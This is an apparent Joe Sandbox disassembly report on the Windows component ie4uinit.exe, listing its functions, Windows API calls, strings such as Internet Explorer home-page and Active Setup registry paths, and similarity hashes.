BrandIEActiveSetup.IEDKCS32 ref: 00007FF6B5212A6A

Strings

In CmdOldUserInstall, xrefs: 00007FF6B5212952
-ClearIconCache, xrefs: 00007FF6B52129AB
SIGNUP, xrefs: 00007FF6B5212A5F
In CmdClearIconCacheOnStartup, xrefs: 00007FF6B521297E
h, xrefs: 00007FF6B52129D6
SOFTWARE\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47}, xrefs: 00007FF6B5212A48

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: File$CloseHandleMessageTaskmemsetwcscat_s$#820ActiveAllocAttributesBrandCreateDeleteFindFirstFormatFreeLocalModuleNamePostProcessSetupThreadTime
String ID: -ClearIconCache$In CmdClearIconCacheOnStartup$In CmdOldUserInstall$SIGNUP$SOFTWARE\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47}$h
API String ID: 2432925687-1244318026
Opcode ID: 56df7f446089ae52464e402a5eb854fb3de3c1adea7f8df31a9769565c38b7a3
Instruction ID: fe356aab2a7bd84673077cb781059c2799ad4712941d3a95c4dc5439d741f7e3
Opcode Fuzzy Hash: 56df7f446089ae52464e402a5eb854fb3de3c1adea7f8df31a9769565c38b7a3
Instruction Fuzzy Hash: 13315532A1AA4286FB20DB28EE503EA73A5FF54B54F400135D74D8656EDF7CD949CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A568 Relevance: 16.7, APIs: 11, Instructions: 190
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF6B521A5E8
SetFileAttributesW.KERNEL32 ref: 00007FF6B521A66D
GetLastError.KERNEL32 ref: 00007FF6B521A67F
SHGetFolderPathW.SHELL32 ref: 00007FF6B521A6F2
wcscat_s.MSVCRT ref: 00007FF6B521A713
wcscat_s.MSVCRT ref: 00007FF6B521A72C
wcscat_s.MSVCRT ref: 00007FF6B521A743
FindFirstFileW.KERNEL32 ref: 00007FF6B521A755
wcscat_s.MSVCRT ref: 00007FF6B521A7B3
FindNextFileW.KERNEL32 ref: 00007FF6B521A80F
FindClose.KERNEL32 ref: 00007FF6B521A824

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: wcscat_s$FileFind$FolderPath$AttributesCloseErrorFirstLastNext
String ID:
API String ID: 1467164853-0
Opcode ID: 64e02491cb4010ce5e86047037c906d86cbcb6d2299f06950c81cfadf552dd9f
Instruction ID: e50e6ae54d105e64b34f1a7a1ac5f5c17cd821e58ca1cdcdc496ee82b907ccd8
Opcode Fuzzy Hash: 64e02491cb4010ce5e86047037c906d86cbcb6d2299f06950c81cfadf552dd9f
Instruction Fuzzy Hash: 7981A232A197D28AFB208B29DE406EA73A4FF48B54F400135DB4D87A8ADF3DE955C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B2C4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B5216638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6B521B2D5), ref: 00007FF6B5216650

LoadLibraryW.KERNEL32 ref: 00007FF6B521B2E0
GetProcAddress.KERNEL32 ref: 00007FF6B521B2F8
LocalFree.KERNEL32 ref: 00007FF6B521B340
FreeLibrary.KERNEL32 ref: 00007FF6B521B349

Strings

shell32-license-UseBingAsDefaultSearchProvider, xrefs: 00007FF6B521B312
slc.dll, xrefs: 00007FF6B521B2D9
SLGetWindowsInformation, xrefs: 00007FF6B521B2EE

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeLibraryOnce$AddressExecuteInitLoadLocalProc
String ID: SLGetWindowsInformation$shell32-license-UseBingAsDefaultSearchProvider$slc.dll
API String ID: 3052823752-3737774969
Opcode ID: 772a31fb7a85bf047e01a29ba095c824e92487191fb3924192b1c1c43bb95f5e
Instruction ID: 950073248dfcc0f795cfeca6da710d90068d3d3b541648553dbbafad7af3e2d9
Opcode Fuzzy Hash: 772a31fb7a85bf047e01a29ba095c824e92487191fb3924192b1c1c43bb95f5e
Instruction Fuzzy Hash: 24113025A0A65686EE209B18EF840FA63B0EF45F85B440035DB4D8365ADF3EF85DC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215974 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowtimethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD

Part of subcall function 00007FF6B5215A5C: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6B52159EE), ref: 00007FF6B5215AA6
Part of subcall function 00007FF6B5215A5C: PostThreadMessageW.USER32 ref: 00007FF6B5215AC1

FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
PostThreadMessageW.USER32 ref: 00007FF6B5215A39

Strings

%1!02d!/%2!02d!/%3!04d!:%4!02d!:%5!02d!:%6!02d!: , xrefs: 00007FF6B52159DD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Message$FormatPostThread$LocalTime
String ID: %1!02d!/%2!02d!/%3!04d!:%4!02d!:%5!02d!:%6!02d!:
API String ID: 2193567623-20010298
Opcode ID: 8e3263cc699ecd0aa0c82a912417d6bd80a7a379467089e1f252b253ad87bcc9
Instruction ID: 2302b158cf7e72f5be4923bbd2a6e5b40f32e93d71f178f7adf845efb593bee1
Opcode Fuzzy Hash: 8e3263cc699ecd0aa0c82a912417d6bd80a7a379467089e1f252b253ad87bcc9
Instruction Fuzzy Hash: F5217C73B15B218AE7108FA4E9808AE73B4F748B48B441539EF8D53B58DF38D550CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5233DA0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B5233DAB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 110c649ca0281d20594c563d757f563e5d0fb9d2cd1ca0146d1c711132392f09
Instruction ID: f6236fd2ab90916c53133efc4085472fec4d895ce31e97ea606f10561473aa19
Opcode Fuzzy Hash: 110c649ca0281d20594c563d757f563e5d0fb9d2cd1ca0146d1c711132392f09
Instruction Fuzzy Hash: 7EB09210E2B44AC5D624AB29AE810A012A06B68B10FC00470C20DC5125EE2CAA9B8700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A854 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B521A568: SetFileAttributesW.KERNEL32 ref: 00007FF6B521A66D
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A72C
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A743
Part of subcall function 00007FF6B521A568: FindFirstFileW.KERNEL32 ref: 00007FF6B521A755

memset.MSVCRT ref: 00007FF6B521A8D8
#820.IERTUTIL ref: 00007FF6B521A8EE
CoTaskMemAlloc.OLE32 ref: 00007FF6B521A95F
CoTaskMemFree.OLE32 ref: 00007FF6B521A9CC
#793.IERTUTIL ref: 00007FF6B521AA21
GetCurrentProcess.KERNEL32 ref: 00007FF6B521AA2C
#139.IERTUTIL ref: 00007FF6B521AA35
#820.IERTUTIL ref: 00007FF6B521AA5D
SHCreateDirectoryExW.SHELL32 ref: 00007FF6B521AA78
GetFileAttributesW.KERNEL32 ref: 00007FF6B521AAA0
SetFileAttributesW.KERNEL32 ref: 00007FF6B521AAB3
#820.IERTUTIL ref: 00007FF6B521AAD2
SetFileAttributesW.KERNEL32 ref: 00007FF6B521AB08
GetLastError.KERNEL32 ref: 00007FF6B521AB12
GetTempPathW.KERNEL32 ref: 00007FF6B521AB4B
GetFileAttributesW.KERNEL32 ref: 00007FF6B521AB9D
SetFileAttributesW.KERNEL32 ref: 00007FF6B521ABB5
GetLastError.KERNEL32 ref: 00007FF6B521ABBF

Strings

Low, xrefs: 00007FF6B521AB55

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: File$Attributes$#820$ErrorLastTaskwcscat_s$#139#793AllocCreateCurrentDirectoryFindFirstFreePathProcessTempmemset
String ID: Low
API String ID: 1277562531-2865053249
Opcode ID: f2894baa83cacf3801aed46f26785fe208f282d279c5377f21632f7fa65eb7e4
Instruction ID: 371062eaee32e9b388766e080018e4353f31bb00d658d0e933b10c19a21d40cc
Opcode Fuzzy Hash: f2894baa83cacf3801aed46f26785fe208f282d279c5377f21632f7fa65eb7e4
Instruction Fuzzy Hash: 2FA1C521B0A75246F7209B29EE842EB66A5FF54F54F400135DB4EC769ADF3EE9058340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52118B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 113
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00007FF6B52118D7
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B521191D
SysStringLen.OLEAUT32 ref: 00007FF6B5211974
VarBstrCat.OLEAUT32 ref: 00007FF6B521198E
SysFreeString.OLEAUT32 ref: 00007FF6B521199E
LocalFree.KERNEL32 ref: 00007FF6B52119E9
SysFreeString.OLEAUT32 ref: 00007FF6B52119F2

Part of subcall function 00007FF6B5211440: SysAllocStringLen.OLEAUT32 ref: 00007FF6B52114AB
Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B52114BC
Part of subcall function 00007FF6B5211440: memcpy_s.MSVCRT ref: 00007FF6B52114D8
Part of subcall function 00007FF6B5211440: memcpy_s.MSVCRT ref: 00007FF6B521150A
Part of subcall function 00007FF6B5211440: SysFreeString.OLEAUT32 ref: 00007FF6B5211533

GetLastError.KERNEL32 ref: 00007FF6B52119FA
FreeSid.ADVAPI32 ref: 00007FF6B5211A1D

Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B521148B

Strings

(A;CI;KR;;;, xrefs: 00007FF6B5211930
Unable to convert Sid to string for %1!ls!. Result:%2!lx!, xrefs: 00007FF6B5211A03
Unable to Append Sid for %1!ls! to Extended ACL. Result:%2!lx!, xrefs: 00007FF6B52119B3
Unable to Format Sid for %1!ls! to append to Extended ACL., xrefs: 00007FF6B52119CE
Unable to get SID for %1!ls!. Result:%2!lx!, xrefs: 00007FF6B5211A28
DeriveAppContainerSidFromAppContainerName, xrefs: 00007FF6B52118D0

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$memcpy_s$AddressAllocBstrConvertErrorLastLocalProc
String ID: (A;CI;KR;;;$DeriveAppContainerSidFromAppContainerName$Unable to Append Sid for %1!ls! to Extended ACL. Result:%2!lx!$Unable to Format Sid for %1!ls! to append to Extended ACL.$Unable to convert Sid to string for %1!ls!. Result:%2!lx!$Unable to get SID for %1!ls!. Result:%2!lx!
API String ID: 1465574776-613229433
Opcode ID: fe8d265b80429c78db8172beadc71f2150e8a6c2e7a9673794232e0b653d5d66
Instruction ID: 3f2336b9f11d713ea022a21dcf5e767c532238020ddf53234066932cd613e704
Opcode Fuzzy Hash: fe8d265b80429c78db8172beadc71f2150e8a6c2e7a9673794232e0b653d5d66
Instruction Fuzzy Hash: 67515E22B0AA1395EB109F69DE902FA2764BF44F88F444032DF0E8765ADE7DE905C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52116CC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 102
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

RegOpenKeyExW.KERNEL32 ref: 00007FF6B5211794
memset.MSVCRT ref: 00007FF6B52117B0
RegQueryValueExW.KERNEL32 ref: 00007FF6B52117DE
RegSetValueExW.ADVAPI32 ref: 00007FF6B5211857
RegCloseKey.ADVAPI32 ref: 00007FF6B5211874

Strings

Setting Home Page., xrefs: 00007FF6B5211712
`, xrefs: 00007FF6B521183C
Software\microsoft\Internet Explorer\Main, xrefs: 00007FF6B5211786
An invalid value is set in the reg value., xrefs: 00007FF6B52117F7
Setting Home Page. Failed to open registry Key, xrefs: 00007FF6B521187C
Writing Single Home Page to XP Result:%2!lx!, xrefs: 00007FF6B521185D
Original First Home Page Result:%1!lx!, xrefs: 00007FF6B521180B
Original First Home Page Text:[%1!ls!]., xrefs: 00007FF6B5211821

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: MessageValue$CloseFormatLocalOpenPostQueryThreadTimememset
String ID: An invalid value is set in the reg value.$Original First Home Page Result:%1!lx!$Original First Home Page Text:[%1!ls!].$Setting Home Page.$Setting Home Page. Failed to open registry Key$Software\microsoft\Internet Explorer\Main$Writing Single Home Page to XP Result:%2!lx!$`
API String ID: 3787667049-2357394903
Opcode ID: 08fc9fd1b161421b54f3eb049e5f5e505e81bdcb9b291cf88139a34c10ed27a1
Instruction ID: ea025ddc6a451b71f3c4523786cec26839fe7a49e96ab434f345ce979691dfd9
Opcode Fuzzy Hash: 08fc9fd1b161421b54f3eb049e5f5e505e81bdcb9b291cf88139a34c10ed27a1
Instruction Fuzzy Hash: B4516221A19B9685FB218B1CEE411F96371FF44B84F445132EF4D8262AEF7DEA45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5211A70 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 52
registrymemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00007FF6B5211A9A
SysAllocString.OLEAUT32 ref: 00007FF6B5211AAB
LoadLibraryW.KERNEL32 ref: 00007FF6B5211ACA
#38.IERTUTIL ref: 00007FF6B5211AEF
SysFreeString.OLEAUT32 ref: 00007FF6B5211B12

Part of subcall function 00007FF6B52118B0: GetProcAddress.KERNEL32 ref: 00007FF6B52118D7
Part of subcall function 00007FF6B52118B0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B521191D
Part of subcall function 00007FF6B52118B0: SysStringLen.OLEAUT32 ref: 00007FF6B5211974
Part of subcall function 00007FF6B52118B0: VarBstrCat.OLEAUT32 ref: 00007FF6B521198E
Part of subcall function 00007FF6B52118B0: SysFreeString.OLEAUT32 ref: 00007FF6B521199E
Part of subcall function 00007FF6B52118B0: LocalFree.KERNEL32 ref: 00007FF6B52119E9
Part of subcall function 00007FF6B52118B0: SysFreeString.OLEAUT32 ref: 00007FF6B52119F2
Part of subcall function 00007FF6B52118B0: FreeSid.ADVAPI32 ref: 00007FF6B5211A1D

Strings

Userenv.dll, xrefs: 00007FF6B5211AC1
Failed to set security descriptor. Result:%1!lx!, xrefs: 00007FF6B5211AFC
Failed to open registry key. Result:%1!lx!, xrefs: 00007FF6B5211B1D
SOFTWARE\Microsoft\Internet Explorer\TypedURLs, xrefs: 00007FF6B5211A8C
D:PAI(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;RC)(A;CI;KR;;;S-1-15-3-4096), xrefs: 00007FF6B5211AA4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$AddressAllocBstrConvertLibraryLoadLocalOpenProc
String ID: D:PAI(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;RC)(A;CI;KR;;;S-1-15-3-4096)$Failed to open registry key. Result:%1!lx!$Failed to set security descriptor. Result:%1!lx!$SOFTWARE\Microsoft\Internet Explorer\TypedURLs$Userenv.dll
API String ID: 2276871141-1078209490
Opcode ID: ffcd9bca19a3b73e357d37f10257b54ab406a28a07c9219e20d7c6af1da637a9
Instruction ID: 9e77a0654617f7f0b3def26ec847e1887d0d2149e6aa0fbb1ee7c628292d784c
Opcode Fuzzy Hash: ffcd9bca19a3b73e357d37f10257b54ab406a28a07c9219e20d7c6af1da637a9
Instruction Fuzzy Hash: 10119311B1AA1681FE249B19EE501F62361AF85F80F540535CB4EC77AFEE3EEA05C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A2F4 Relevance: 16.6, APIs: 11, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF6B521A339
GetLastError.KERNEL32 ref: 00007FF6B521A348
SHCreateDirectoryExW.SHELL32 ref: 00007FF6B521A363
CreateFileW.KERNEL32 ref: 00007FF6B521A39D
GetLastError.KERNEL32 ref: 00007FF6B521A3B0
ConvertStringSidToSidW.ADVAPI32 ref: 00007FF6B521A3ED
IsValidSid.ADVAPI32 ref: 00007FF6B521A41B
#99.IERTUTIL ref: 00007FF6B521A434
LocalFree.KERNEL32 ref: 00007FF6B521A447
#37.IERTUTIL ref: 00007FF6B521A48F
FindCloseChangeNotification.KERNEL32 ref: 00007FF6B521A4B6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Create$ErrorFileLast$ChangeCloseConvertDirectoryFindFreeLocalNotificationStringValid
String ID:
API String ID: 2025823435-0
Opcode ID: 29ec17aea24583c94ef666305796be332b3d32db1cf230e3dd3bf04aaae41091
Instruction ID: c2f28e35bf733d9d52fd36c94051f9290ddb23ae2ef69595287712ba6ce8a877
Opcode Fuzzy Hash: 29ec17aea24583c94ef666305796be332b3d32db1cf230e3dd3bf04aaae41091
Instruction Fuzzy Hash: 40517821F0A65286F7608B69DF487BE2694AF44FA4F044235CF1D87A9ACF7DED458340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52157F0 Relevance: 16.6, APIs: 11, Instructions: 92
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B521571C: SHGetFolderPathW.SHELL32 ref: 00007FF6B5215758
Part of subcall function 00007FF6B521571C: SHCreateDirectoryExW.SHELL32 ref: 00007FF6B5215793

CreateFileW.KERNEL32 ref: 00007FF6B5215862
GetLastError.KERNEL32 ref: 00007FF6B5215875
SetFilePointer.KERNEL32 ref: 00007FF6B521588E
WriteFile.KERNEL32 ref: 00007FF6B52158B5
memset.MSVCRT ref: 00007FF6B52158C6
SetEvent.KERNEL32 ref: 00007FF6B52158CE
GetMessageW.USER32 ref: 00007FF6B52158EB
CloseHandle.KERNEL32 ref: 00007FF6B521590A
WriteFile.KERNEL32 ref: 00007FF6B521592C
LocalFree.KERNEL32 ref: 00007FF6B5215937
GetLastError.KERNEL32 ref: 00007FF6B521593F

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: File$CreateErrorLastWrite$CloseDirectoryEventFolderFreeHandleLocalMessagePathPointermemset
String ID:
API String ID: 3115231533-0
Opcode ID: e73cae9eeb114b7df5a807fa29b48a1195ea4523afd7f170b2e2f38376eded09
Instruction ID: 78d57004b25fddb44ac2820e26fc42de4d196192b193413f2cbba9cd9aef971f
Opcode Fuzzy Hash: e73cae9eeb114b7df5a807fa29b48a1195ea4523afd7f170b2e2f38376eded09
Instruction Fuzzy Hash: 11418331719A5186E7209F29EE446A973A4FB88FA4F540231DB5D83B99CF3DED06CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B523363C Relevance: 10.6, APIs: 7, Instructions: 143
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF6B5233664
Sleep.KERNEL32 ref: 00007FF6B523369B
_amsg_exit.MSVCRT ref: 00007FF6B52336B9
_initterm.MSVCRT ref: 00007FF6B5233744
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6B5233771
exit.KERNELBASE ref: 00007FF6B5233816
_cexit.MSVCRT ref: 00007FF6B5233825

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
String ID:
API String ID: 642454821-0
Opcode ID: e0f9a9c421881e73c0dc6e8755979716e234bf2bb5e58aae01d1bcf6a5ac225e
Instruction ID: cddc412b516e00ebf7e1d5333cf4142646fe86d548b49e74c658d87295ea2b21
Opcode Fuzzy Hash: e0f9a9c421881e73c0dc6e8755979716e234bf2bb5e58aae01d1bcf6a5ac225e
